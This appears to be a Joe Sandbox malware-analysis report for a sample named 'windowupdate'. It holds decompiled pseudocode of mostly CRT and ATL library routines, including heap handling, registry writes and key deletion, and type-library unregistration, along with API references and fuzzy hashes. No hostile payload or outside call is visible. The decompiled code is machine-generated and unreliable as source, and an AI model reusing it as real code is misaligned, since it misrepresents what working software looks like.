                      						_v56 = _v36 + 4;
                      						E00D4BF80( &_v20, E00D89580(_v56, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_type_info.cpp", 0x66));
                      						if((E00D4C000( &_v20) & 0x000000ff) != 0) {
                      							_v24 = E00D4C0D0( &_v20);
                      							_v28 = _v24 + 4;
                      							_v64 = 0;
                      							 *_v24 = _v64;
                      							E00D82DE0(_v28, _v36, E00D4C0C0( &_v12));
                      							_v40 = E00D4BF20(_a4, _v28, 0);
                      							if(_v40 == 0) {
                      								E00D4C090( &_v20);
                      								__imp__InterlockedPushEntrySList(_a8, _v24);
                      								_v72 = _v28;
                      								E00D4BFC0( &_v20);
                      								E00D4BFA0( &_v12);
                      								return _v72;
                      							}
                      							_v68 = _v40;
                      							E00D4BFC0( &_v20);
                      							E00D4BFA0( &_v12);
                      							return _v68;
                      						}
                      						_v60 = 0;
                      						E00D4BFC0( &_v20);
                      						E00D4BFA0( &_v12);
                      						return _v60;
                      					}
                      					_v52 = 0;
                      					E00D4BFA0( &_v12);
                      					return _v52;
                      				}
                      				return _v32;
                      			}






















                      APIs
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp, xrefs: 00D4C356
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name___un
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
                      • API String ID: 3905892445-4032652797
                      • Opcode ID: a2ec06630e1a5d14abf739397300a650ea4d577b602c35f91a6ff5321a30b55b
                      • Instruction ID: d52ef2a05bb797adc55017bfdbdf3a59f957231ac7f392cb7fde4a3dba4fa4a1
                      • Opcode Fuzzy Hash: a2ec06630e1a5d14abf739397300a650ea4d577b602c35f91a6ff5321a30b55b
                      • Instruction Fuzzy Hash: DA5109B1D11108ABDB08EFA4D896AFEB7B4EF54304F404069E406B7291EB35AA45CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D3B1C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				char _v12;
                      				char _v24;
                      				intOrPtr _v32;
                      				char _v40;
                      				signed int _v48;
                      				signed int _v53;
                      				struct HINSTANCE__* _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr* _v76;
                      				void _v80;
                      				void* _t62;
                      				intOrPtr _t68;
                      				void* _t70;
                      				void* _t82;
                      				void* _t87;
                      				struct HINSTANCE__* _t89;
                      				_Unknown_base(*)()* _t91;
                      				intOrPtr _t118;
                      				void* _t135;
                      				void* _t136;
                      				void* _t137;
                      
                      				_t131 = __esi;
                      				memset( &_v80, 0xcccccccc, 0x13 << 2);
                      				_t137 = _t136 + 0xc;
                      				E00D32ED0( &_v12);
                      				E00D3E6E0( &_v24);
                      				_t62 = E00D3E760( &_v24);
                      				_v32 = E00D3A1D0(__ebx, _a4, _a8, E00D32F40( &_v12), _t62);
                      				if(_v32 < 0) {
                      					L10:
                      					_t118 = _v32;
                      					_v72 = _t118;
                      					E00D36450( &_v24, __eflags);
                      					E00D330B0( &_v12, _t131);
                      					_t68 = _v72;
                      					L11:
                      					_push(_t118);
                      					E00DC14C0(_t135, 0xd3b364);
                      					_t70 = _t68;
                      					return E00DC1520(_t70, _t135 - _t137 + 0x4c);
                      				}
                      				_v76 = E00D3E710( &_v24);
                      				_t131 = _t137;
                      				_v32 = E00DC1520( *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x1c))))(_v76,  &_v40), _t137 - _t137);
                      				if(_v32 < 0) {
                      					goto L10;
                      				}
                      				_v48 = 0;
                      				_v53 = 0;
                      				_v32 = E00D3A1A0( &_v53);
                      				_t143 = _v32;
                      				if(_v32 >= 0) {
                      					__eflags = (_v53 & 0x000000ff) - 1;
                      					if((_v53 & 0x000000ff) == 1) {
                      						_t89 = GetModuleHandleW(L"OLEAUT32.DLL");
                      						__eflags = _t137 - _t137;
                      						_v64 = E00DC1520(_t89, _t137 - _t137);
                      						__eflags = _v64;
                      						if(_v64 != 0) {
                      							_t91 = GetProcAddress(_v64, "UnRegisterTypeLibForUser");
                      							__eflags = _t137 - _t137;
                      							_v48 = E00DC1520(_t91, _t137 - _t137);
                      						}
                      					}
                      					__eflags = _v48;
                      					if(_v48 == 0) {
                      						_v48 = __imp__#186;
                      					}
                      					_t82 = _v48(_v40,  *(_v40 + 0x18) & 0x0000ffff,  *(_v40 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_v40 + 0x10)),  *((intOrPtr*)(_v40 + 0x14)));
                      					__eflags = _t137 - _t137;
                      					_v32 = E00DC1520(_t82, _t137 - _t137);
                      					_v80 = E00D3E710( &_v24);
                      					_t131 = _t137;
                      					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x30))))(_v80, _v40);
                      					__eflags = _t137 - _t137;
                      					E00DC1520(_t87, __eflags);
                      					goto L10;
                      				}
                      				_t118 = _v32;
                      				_v68 = _t118;
                      				E00D36450( &_v24, _t143);
                      				E00D330B0( &_v12, _t131);
                      				_t68 = _v68;
                      				goto L11;
                      			}


























                      APIs
                      • ~Module.VCCORLIBD ref: 00D3B26C
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 00D3B291
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00D3B2B2
                      • ~Module.VCCORLIBD ref: 00D3B331
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3B34B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$AddressCheckFreeHandleProcStackStringVars@8
                      • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
                      • API String ID: 1449819490-2196524522
                      • Opcode ID: 495e6f849a8bca6e68df0d3646d6eb0d706d5ad3ea451a25546c2c97fb9b0408
                      • Instruction ID: 663f5ea362d672193b481af0ddf6d3a6809888b89c6364a3b7b663b53adc71f8
                      • Opcode Fuzzy Hash: 495e6f849a8bca6e68df0d3646d6eb0d706d5ad3ea451a25546c2c97fb9b0408
                      • Instruction Fuzzy Hash: 8B515B76D002199FCB08EFA9D891AEEB7B4EF88310F108159E511B7291DB34AE45CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00D383D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				char _v24;
                      				char _v44;
                      				char _v56;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				char _v80;
                      				intOrPtr _v84;
                      				char _v88;
                      				char _v92;
                      				intOrPtr _t60;
                      				void* _t62;
                      				void* _t64;
                      				intOrPtr _t68;
                      				intOrPtr _t78;
                      				intOrPtr _t97;
                      				void* _t101;
                      				void* _t104;
                      				void* _t105;
                      				void* _t106;
                      
                      				_t103 = __esi;
                      				_t74 = __ebx;
                      				_push(__ecx);
                      				_t101 =  &_v92;
                      				memset(_t101, 0xcccccccc, 0x16 << 2);
                      				_t106 = _t105 + 0xc;
                      				_t102 = _t101 + 0x16;
                      				_pop(_t78);
                      				_v8 = _t78;
                      				E00D341C0( &_v24, 0);
                      				E00D3E200( &_v44);
                      				_v56 = 0;
                      				_t97 = _a8;
                      				_v64 = E00D38100(__ebx, _v8, _t97, _t101 + 0x16, __esi, _a12, _t97,  &_v44,  &_v56);
                      				_t110 = _v64;
                      				if(_v64 >= 0) {
                      					_t97 = _a4;
                      					E00D342A0( &_v24, _t97);
                      					_v68 = 2;
                      					__eflags = _a4;
                      					if(_a4 != 0) {
                      						__eflags = _v56;
                      						if(__eflags == 0) {
                      							_v88 = _v44;
                      						} else {
                      							_v88 = _v56;
                      						}
                      						_t97 = _v88;
                      						_v68 = E00D34A80(_t74,  &_v24, _t102, _t103, __eflags, _t97);
                      					}
                      					__eflags = _v68;
                      					if(__eflags != 0) {
                      						__eflags = _v68 - 2;
                      						if(__eflags != 0) {
                      							__eflags = _v68 - 3;
                      							if(__eflags != 0) {
                      								__eflags = _v56;
                      								if(__eflags == 0) {
                      									_v92 = _v44;
                      								} else {
                      									_v92 = _v56;
                      								}
                      								_t97 = _v92;
                      								_t64 = E00D3F1F0(0xf237ac);
                      								E00D323E0(_t74, _t102, _t103, __eflags, E00D323B0( &_v80, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x1ad), _t64, 0, "Failed to delete key %Ts or one of its subkeys\n", _t97);
                      								_t68 = E00D32E00( &_v80, __eflags, _v68);
                      								_t106 = _t106 + 0x18;
                      								_v64 = _t68;
                      							}
                      						}
                      					}
                      					E00D34260( &_v24);
                      					_v84 = _v64;
                      					E00D41F30( &_v44, __eflags);
                      					E00D34220( &_v24, __eflags);
                      					_t60 = _v84;
                      				} else {
                      					_v72 = _v64;
                      					E00D41F30( &_v44, _t110);
                      					E00D34220( &_v24, _t110);
                      					_t60 = _v72;
                      				}
                      				_push(_t97);
                      				E00DC14C0(_t104, 0xd38528);
                      				_t62 = _t60;
                      				return E00DC1520(_t62, _t104 - _t106 + 0x58);
                      			}

























                      APIs
                      • std::exception::exception.LIBCMTD ref: 00D383F8
                        • Part of subcall function 00D38100: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D382EA
                      • ~Module.VCCORLIBD ref: 00D38436
                      • _Smanip.LIBCPMTD ref: 00D384C8
                      • ~Module.VCCORLIBD ref: 00D384FE
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D38510
                      Strings
                      • Failed to delete key %Ts or one of its subkeys, xrefs: 00D384A9
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D384C0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$Smanipstd::exception::exception
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Failed to delete key %Ts or one of its subkeys
                      • API String ID: 2246551222-193758817
                      • Opcode ID: 588587a022eab65aff8b82a1c6e626ac6bc3dbb647e843afe7b033f07e46741c
                      • Instruction ID: 150a69afbbdd57a341cb8d2ac4846144dd653612e03ef8fd8b4b47221503de3d
                      • Opcode Fuzzy Hash: 588587a022eab65aff8b82a1c6e626ac6bc3dbb647e843afe7b033f07e46741c
                      • Instruction Fuzzy Hash: 9C411775D01249EBCB18EFD4E996AEEB7B5EF48300F144029F40267291DB746E49CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E00D9CA20(void* __ecx, void* _a4, signed int _a8) {
                      				long _v8;
                      				long _v12;
                      				signed int _v16;
                      				void* _v20;
                      				long _v24;
                      				long _v28;
                      				void* _t27;
                      				intOrPtr _t33;
                      				signed char _t36;
                      				void* _t44;
                      				void* _t45;
                      				void* _t50;
                      				void* _t53;
                      
                      				_t45 = __ecx;
                      				if(_a4 == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				_t57 = _v12;
                      				if(_v12 == 0) {
                      					_t44 = L00D84930(_t57, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0, L"%ls", L"block != nullptr");
                      					_t53 = _t53 + 0x18;
                      					if(_t44 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					__eflags = _a8 - 0xffffffe0;
                      					if(_a8 <= 0xffffffe0) {
                      						_t27 =  *0xf21510; // 0x1050000
                      						_v28 = HeapSize(_t27, 0, _a4);
                      						__eflags = _a8;
                      						if(_a8 != 0) {
                      							_v16 = _a8;
                      						} else {
                      							_v16 = 1;
                      						}
                      						_v24 = _v16;
                      						_t47 = _a4;
                      						_t50 =  *0xf21510; // 0x1050000
                      						_v20 = HeapReAlloc(_t50, 0x10, _a4, _v24);
                      						__eflags = _v20;
                      						if(_v20 == 0) {
                      							__eflags = _v24 - _v28;
                      							if(_v24 > _v28) {
                      								L18:
                      								_t33 = E00D82E90(_t47, GetLastError());
                      								 *((intOrPtr*)(L00D82F70(_t47))) = _t33;
                      								__eflags = 0;
                      								return 0;
                      							}
                      							_t47 = _v28;
                      							_t36 = E00D9C9A0(_v28);
                      							_t53 = _t53 + 4;
                      							__eflags = _t36 & 0x000000ff;
                      							if((_t36 & 0x000000ff) != 0) {
                      								goto L18;
                      							}
                      							return _a4;
                      						} else {
                      							return _v20;
                      						}
                      					}
                      					 *((intOrPtr*)(L00D82F70(_t45))) = 0xc;
                      					return 0;
                      				} else {
                      					 *((intOrPtr*)(L00D82F70(_t45))) = 0x16;
                      					E00D82900(L"block != nullptr", L"_expand_base", L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\expand.cpp", 0x3e, 0);
                      					return 0;
                      				}
                      			}

















                      APIs
                      • HeapSize.KERNEL32(01050000,00000000,00000000), ref: 00D9CAC5
                      • HeapReAlloc.KERNEL32(01050000,00000010,00000000,?), ref: 00D9CAFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$AllocSize
                      • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                      • API String ID: 3906553864-3244948836
                      • Opcode ID: b9bb28fc481e957b2da72280469326c37e75c87f5e36df6a6b010474b26e6733
                      • Instruction ID: 55bdbdc616bd160ec1b27bf02b7e9245706a0855aeeede9724184ce805fbc544
                      • Opcode Fuzzy Hash: b9bb28fc481e957b2da72280469326c37e75c87f5e36df6a6b010474b26e6733
                      • Instruction Fuzzy Hash: 67316B70D1020DEFDF20EFA4D846BAEB7B0EB44744F149559E505AB281D3B59A40DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 57%
                      			E00D42030(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr* _v8;
                      				intOrPtr* _v12;
                      				intOrPtr* _v16;
                      				intOrPtr* _v20;
                      				char _v24;
                      				void* _t33;
                      				intOrPtr _t37;
                      				void* _t40;
                      				void* _t41;
                      				void* _t46;
                      				void* _t64;
                      				void* _t68;
                      				void* _t69;
                      
                      				_t64 = __edi;
                      				_t47 = __ebx;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = E00D33B30(__ebx, 0xf23710, __eflags);
                      				_t72 = _v8;
                      				if(_v8 == 0) {
                      					_t46 = L00D84930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf2f, 0, L"%ls", L"pThis != 0");
                      					_t69 = _t69 + 0x18;
                      					if(_t46 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v8 != 0) {
                      					 *((intOrPtr*)(_v8 + 4)) = _a4;
                      					_t66 = _t69;
                      					_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))();
                      					__eflags = _t69 - _t69;
                      					E00D3C490(_v8 + 8, __eflags, E00DC1520(_t33, __eflags), _v8);
                      					_v12 = E00D3C4D0(_v8 + 8, __eflags);
                      					_t37 = E00D3C3E0(_t69, _a4, 4, _v12);
                      					_t69 = _t69 + 0xc;
                      					_v16 = _t37;
                      					__eflags = _v16 - E00D42030;
                      					if(__eflags != 0) {
                      						_push("Subclassing through a hook discarded.\n");
                      						_push(0);
                      						_push(E00D3F1E0(0xf23748));
                      						_push(E00D323B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf3e));
                      						E00D323E0(_t47, _t64, _t66, __eflags);
                      						_t69 = _t69 + 0x10;
                      					}
                      					_t40 = _v12(_a4, _a8, _a12, _a16);
                      					__eflags = _t69 - _t69;
                      					_t41 = E00DC1520(_t40, __eflags);
                      				} else {
                      					_t41 = 0;
                      				}
                      				return E00DC1520(_t41, _t68 - _t69 + 0x14);
                      			}

















                      APIs
                      • ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00D420D8
                      • _Smanip.LIBCPMTD ref: 00D4210B
                      Strings
                      • pThis != 0, xrefs: 00D4205E
                      • Subclassing through a hook discarded., xrefs: 00D420EC
                      • %ls, xrefs: 00D42063
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D42103
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D4206F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CompareExchangeInlineInterlockedPointerSmanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$Subclassing through a hook discarded.$pThis != 0
                      • API String ID: 2445389785-534117427
                      • Opcode ID: a2d504e8f27c990da4151e1e06604ced7d01949bceee03a1be20a75bbd117f7e
                      • Instruction ID: 413a9af892f5eb6804a379950296c9ade35e99e48bc67c00902f5aa7c59c0336
                      • Opcode Fuzzy Hash: a2d504e8f27c990da4151e1e06604ced7d01949bceee03a1be20a75bbd117f7e
                      • Instruction Fuzzy Hash: 7E318FB5E00208BFCB04EFA8C952BAEB7B4EF48704F144558F505A7282D670AF40DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00D34840(void** __ecx, void* __esi, char* _a4, char* _a8, int _a12) {
                      				void** _v8;
                      				int _v12;
                      				int _v16;
                      				void* _t22;
                      				long _t26;
                      				void* _t27;
                      				void* _t29;
                      				void* _t30;
                      				void* _t31;
                      				void* _t41;
                      				void* _t42;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t44 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t31 = L00D84930(_t44, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1877, 0, "%ls", L"m_hKey != 0");
                      						_t42 = _t42 + 0x18;
                      						if(_t31 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				L5:
                      				L5:
                      				if(_a8 == 0) {
                      					_v16 = 0;
                      				} else {
                      					_v16 = 1;
                      				}
                      				_v12 = _v16;
                      				_t48 = _v12;
                      				if(_v12 == 0) {
                      					_t30 = L00D84930(_t48, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1878, 0, "%ls", L"__atl_condVal");
                      					_t42 = _t42 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					goto L13;
                      				}
                      				_t27 = 0xd;
                      				L19:
                      				return E00DC1520(_t27, _t41 - _t42 + 0xc);
                      				L13:
                      				__eflags = 0;
                      				if(0 != 0) {
                      					goto L5;
                      				}
                      				__eflags = _a12 - 1;
                      				if(_a12 != 1) {
                      					__eflags = _a12 - 2;
                      					if(__eflags != 0) {
                      						_t29 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1879, 0, "%ls", L"(dwType == ( 1ul )) || (dwType == ( 2ul ))");
                      						_t42 = _t42 + 0x18;
                      						__eflags = _t29 - 1;
                      						if(_t29 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				}
                      				_t22 = E00D82E00(_a8);
                      				_t42 = _t42 + 4;
                      				_t26 = RegSetValueExA( *_v8, _a4, 0, _a12, _a8, _t22 + 1);
                      				__eflags = _t42 - _t42;
                      				_t27 = E00DC1520(_t26, __eflags);
                      				goto L19;
                      			}















                      APIs
                      • _strlen.LIBCMT ref: 00D34920
                      • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,00000000,-00000001), ref: 00D34942
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$(dwType == ( 1ul )) || (dwType == ( 2ul ))$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-2957920586
                      • Opcode ID: 3cfe50dec5e056c9c9662e13d788d90a1caba3a3cbeb762404f5f3908da29696
                      • Instruction ID: 72aa554d054ed5b17dfa7a887cbca3f3d9f10a9843cff8c1831cc5dc2c70d203
                      • Opcode Fuzzy Hash: 3cfe50dec5e056c9c9662e13d788d90a1caba3a3cbeb762404f5f3908da29696
                      • Instruction Fuzzy Hash: 5031C175E40349BFDB20BF89DC47FAE7364AB11704F188168F504662C1E2B8AA548BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D9D8A0(signed int __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr _a16) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				intOrPtr _v32;
                      				void* _t35;
                      				void* _t38;
                      				signed int _t55;
                      				void* _t75;
                      				void* _t76;
                      				void* _t77;
                      
                      				_t74 = __edi;
                      				_t55 = __ecx;
                      				_t35 = E00D84020( &_a4);
                      				_t76 = _t75 + 4;
                      				_v16 = _t35 + 1;
                      				if(_v16 <= (_t55 | 0xffffffff) - _a12) {
                      					_v12 = _a12 + _v16 + 1;
                      					_t38 = L00D892C0(_a12 + _v16 + 1, __edi, _v12, 1, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x98);
                      					_t77 = _t76 + 0x14;
                      					E00D4BF60( &_v8, _t38);
                      					if(_a12 > 0) {
                      						_v20 = E00D4C0C0( &_v8);
                      						E00D84A20(E00D9E240( &_v20,  &_v12,  &_a8,  &_a12), _t52, L"traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x9c, 0);
                      						_t77 = _t77 + 0x28;
                      					}
                      					_v24 = _v12 - _a12;
                      					_v28 = E00D4C0C0( &_v8) + _a12;
                      					E00D84A20(E00D9E270( &_v28,  &_v24,  &_a4,  &_v16), _t43, L"traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)", L"copy_and_add_argument_to_buffer", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0xa3, 0);
                      					_v32 = E00D9E8C0(_a16, _t74, E00D8C129( &_v8));
                      					E00D4BFA0( &_v8);
                      					return _v32;
                      				}
                      				return 0xc;
                      			}

















                      APIs
                        • Part of subcall function 00D84020: _strlen.LIBCMT ref: 00D8402B
